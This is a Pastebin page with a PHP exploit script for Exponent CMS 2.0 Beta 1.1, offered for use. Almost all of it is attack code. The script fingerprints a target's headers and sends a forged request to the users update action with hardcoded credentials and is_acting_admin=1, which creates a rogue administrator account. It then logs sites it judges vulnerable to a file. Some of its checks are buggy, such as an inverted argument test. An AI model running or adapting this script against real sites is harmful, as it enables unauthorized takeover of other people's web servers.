Googleinurl

[EXPLOIT] Exponent CMS 2.0 Beta 1.1 CSRF Add ADM A

Dec 14th, 2014
872
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(1);
  4. set_time_limit(0);
  5. ini_set('display_errors', 1);
  6. ini_set('max_execution_time', 0);
  7. ini_set('allow_url_fopen', 1);
  8. ob_implicit_flush(true);
  9. ob_end_flush();
  10. //Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account
  11. //http://www.exploit-db.com/exploits/17235/
  12. print !empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  13. $argv[1] =  isset($argv[1]) && strstr($argv[1],'http') ? $argv[1] : "http://{$argv[1]}";
  14. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  15. $line = "\n------------------------------------------------------------------------------------------------------------------";
  16. $config['alvo'] = $alvo_[0][0];
  17. $config['user'] = 'inurlbr';
  18. $config['pass1'] = 'brbr';
  19. $config['pass2'] = 'brbr';
  20. $config['email'] = 'you@mail.com';
  21. $config['firstname'] = 'name';
  22. $config['lastname'] = 'las name';
  23.  
  24. $config['exploit'] = "/exponent/index.php?module=users&action=update&username={$config['user']}&pass1={$config['pass1']}&pass2={$config['pass2']}&email={$config['email']}&firstname={$config['firstname']}&lastname={$config['lastname']}&is_acting_admin=1";
  25. $exec = $config['alvo'] . $config['exploit'];
  26. $headers = get_headers($argv[1], 1);
  27. print "\r\n0x[EXPLOIT NAME]: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account / INURL - BRASIL";
  28. print $line;
  29. print "\n0x " . date("h:m:s") . " [INFO]: ";
  30. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  31. print "\n0x " . date("h:m:s") . " [INFO]: ";
  32. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  33. print "\n0x " . date("h:m:s") . " [INFO]: ";
  34. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  35. print "\n0x " . date("h:m:s") . " [INFO]: TARGET: {$alvo_[0][0]}";
  36.  
  37. function __request($url) {
  38.  
  39.     $objcurl = curl_init();
  40.     curl_setopt($objcurl, CURLOPT_URL, $url);
  41.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  42.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  43.     curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
  44.     $corpo = curl_exec($objcurl);
  45.     return ($corpo);
  46. }
  47.  
  48. $rest = __request($exec);
  49. preg_match_all('(Server:.*)', $rest, $status['server']);
  50. print $line;
  51. if (!strstr($rest, 'Resource Not Found') && strstr($status['server'], '200')) {
  52.     $file = "\n0x " . date("h:m:s") . " [INFO][EXPLOIT]:: {$config['exploit']}";
  53.     $file.= "\n0x " . date("h:m:s") . " [INFO][RESULTADO]:: {IS VULL}";
  54.     print $file;
  55.     file_put_contents('lfd.txt', "{$line}{$file}{$line}\n", FILE_APPEND);
  56. } else {
  57.     print "\n0x " . date("h:m:s") . " [INFO][RESULTADO]:: {NOT VULL}";
  58. }
  59.  
  60. print $line;
  61. print $rest;
RAW Paste Data